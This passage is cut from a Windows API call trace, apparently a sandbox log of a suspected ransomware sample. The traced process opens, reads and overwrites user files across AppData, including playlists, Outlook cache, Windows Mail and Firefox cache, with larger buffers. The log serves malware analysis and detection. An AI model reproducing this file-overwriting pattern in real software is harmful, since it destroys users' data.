lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0166.481] WriteFile (in: hFile=0x130, lpBuffer=0x2873108*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2873108*, lpNumberOfBytesWritten=0x331f2d0*=0x800, lpOverlapped=0x0) returned 1 [0166.481] CloseHandle (hObject=0x130) returned 1 [0166.482] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0166.482] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.482] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x7000 [0166.483] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.483] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.483] ReleaseMutex (hMutex=0x168) returned 1 [0166.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft at Home~.feed-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0166.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft at Home~.feed-ms", cchWideChar=26, lpMultiByteStr=0x1f8fd5c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft at Home~.feed-ms", lpUsedDefaultChar=0x0) returned 26 [0166.483] ReadFile (in: hFile=0x130, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.485] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x6000 [0166.485] ReadFile (in: hFile=0x130, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.486] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x6000 [0166.486] WriteFile (in: hFile=0x130, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0166.486] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0166.486] WriteFile (in: hFile=0x130, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0166.487] CloseHandle (hObject=0x130) returned 1 [0166.487] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0166.489] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.489] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x43 [0166.489] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.489] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.489] ReleaseMutex (hMutex=0x168) returned 1 [0166.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0166.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0166.489] ReadFile (in: hFile=0x130, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x43, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x331f2bc*=0x43, lpOverlapped=0x0) returned 1 [0166.490] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0166.490] WriteFile (in: hFile=0x130, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5cb, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x331f2d0*=0x5cb, lpOverlapped=0x0) returned 1 [0166.491] CloseHandle (hObject=0x130) returned 1 [0166.491] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\03_music_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0166.492] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.492] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4f3 [0166.492] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.492] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.492] ReleaseMutex (hMutex=0x168) returned 1 [0166.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="03_Music_rated_at_4_or_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0166.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="03_Music_rated_at_4_or_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x1fa54dc, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="03_Music_rated_at_4_or_5_stars.wpl", lpUsedDefaultChar=0x0) returned 34 [0166.493] ReadFile (in: hFile=0x130, lpBuffer=0x1f3be08, nNumberOfBytesToRead=0x4f3, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3be08*, lpNumberOfBytesRead=0x331f2bc*=0x4f3, lpOverlapped=0x0) returned 1 [0166.495] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0166.495] WriteFile (in: hFile=0x130, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xa7b, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x331f2d0*=0xa7b, lpOverlapped=0x0) returned 1 [0166.495] CloseHandle (hObject=0x130) returned 1 [0166.496] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\11_all_pictures.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0166.497] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.497] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x249 [0166.498] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.498] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.498] ReleaseMutex (hMutex=0x168) returned 1 [0166.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="11_All_Pictures.wpl", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0166.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="11_All_Pictures.wpl", cchWideChar=19, lpMultiByteStr=0x1f88c44, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="11_All_Pictures.wpl", lpUsedDefaultChar=0x0) returned 19 [0166.498] ReadFile (in: hFile=0x130, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x249, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x331f2bc*=0x249, lpOverlapped=0x0) returned 1 [0166.499] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0166.499] WriteFile (in: hFile=0x130, lpBuffer=0x2873108*, nNumberOfBytesToWrite=0x7d1, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2873108*, lpNumberOfBytesWritten=0x331f2d0*=0x7d1, lpOverlapped=0x0) returned 1 [0166.500] CloseHandle (hObject=0x130) returned 1 [0166.500] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0166.502] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.502] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x410 [0166.502] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.502] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.502] ReleaseMutex (hMutex=0x168) returned 1 [0166.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="07_TV_recorded_in_the_last_week.wpl", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0166.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="07_TV_recorded_in_the_last_week.wpl", cchWideChar=35, lpMultiByteStr=0x1fa54dc, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="07_TV_recorded_in_the_last_week.wpl", lpUsedDefaultChar=0x0) returned 35 [0166.502] ReadFile (in: hFile=0x130, lpBuffer=0x1e99d58, nNumberOfBytesToRead=0x410, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99d58*, lpNumberOfBytesRead=0x331f2bc*=0x410, lpOverlapped=0x0) returned 1 [0166.508] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0166.508] WriteFile (in: hFile=0x130, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x998, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x331f2d0*=0x998, lpOverlapped=0x0) returned 1 [0166.508] CloseHandle (hObject=0x130) returned 1 [0166.509] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_contactprefs_2_f230e11936b7d740a008ffc660e83c71.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0166.510] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.510] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x104 [0166.510] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.510] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.510] ReleaseMutex (hMutex=0x168) returned 1 [0166.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0166.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", cchWideChar=58, lpMultiByteStr=0x1fc21dc, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", lpUsedDefaultChar=0x0) returned 58 [0166.511] ReadFile (in: hFile=0x130, lpBuffer=0x1eea208, nNumberOfBytesToRead=0x104, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea208*, lpNumberOfBytesRead=0x331f2bc*=0x104, lpOverlapped=0x0) returned 1 [0166.512] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0166.512] WriteFile (in: hFile=0x130, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x68c, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x331f2d0*=0x68c, lpOverlapped=0x0) returned 1 [0166.513] CloseHandle (hObject=0x130) returned 1 [0166.513] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.pat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0166.515] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.515] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4000 [0166.516] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.516] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.516] ReleaseMutex (hMutex=0x168) returned 1 [0166.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMail.pat", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0166.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMail.pat", cchWideChar=15, lpMultiByteStr=0x1f7342c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMail.pat", lpUsedDefaultChar=0x0) returned 15 [0166.516] ReadFile (in: hFile=0x130, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.524] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3000 [0166.524] ReadFile (in: hFile=0x130, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.525] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3000 [0166.525] WriteFile (in: hFile=0x130, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0166.526] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0166.526] WriteFile (in: hFile=0x130, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0166.526] CloseHandle (hObject=0x130) returned 1 [0166.527] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0166.527] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.527] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xeb [0166.528] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.528] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.528] ReleaseMutex (hMutex=0x168) returned 1 [0166.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hand Prints.htm", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0166.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hand Prints.htm", cchWideChar=15, lpMultiByteStr=0x1f7362c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hand Prints.htm", lpUsedDefaultChar=0x0) returned 15 [0166.528] ReadFile (in: hFile=0x130, lpBuffer=0x1ea4ba8, nNumberOfBytesToRead=0xeb, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ba8*, lpNumberOfBytesRead=0x331f2bc*=0xeb, lpOverlapped=0x0) returned 1 [0166.530] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0166.530] WriteFile (in: hFile=0x130, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x673, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x331f2d0*=0x673, lpOverlapped=0x0) returned 1 [0166.530] CloseHandle (hObject=0x130) returned 1 [0166.530] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0167.935] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0167.935] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1f2 [0167.936] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0167.936] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.936] ReleaseMutex (hMutex=0x168) returned 1 [0167.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WMSDKNS.DTD", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0167.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WMSDKNS.DTD", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WMSDKNS.DTD", lpUsedDefaultChar=0x0) returned 11 [0167.936] ReadFile (in: hFile=0x20c, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1f2, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x331f2bc*=0x1f2, lpOverlapped=0x0) returned 1 [0167.937] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0167.937] WriteFile (in: hFile=0x20c, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x77a, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x331f2d0*=0x77a, lpOverlapped=0x0) returned 1 [0167.938] CloseHandle (hObject=0x20c) returned 1 [0167.938] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\24b53d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0168.680] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0168.681] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x133d5 [0168.681] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0168.681] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.681] ReleaseMutex (hMutex=0x168) returned 1 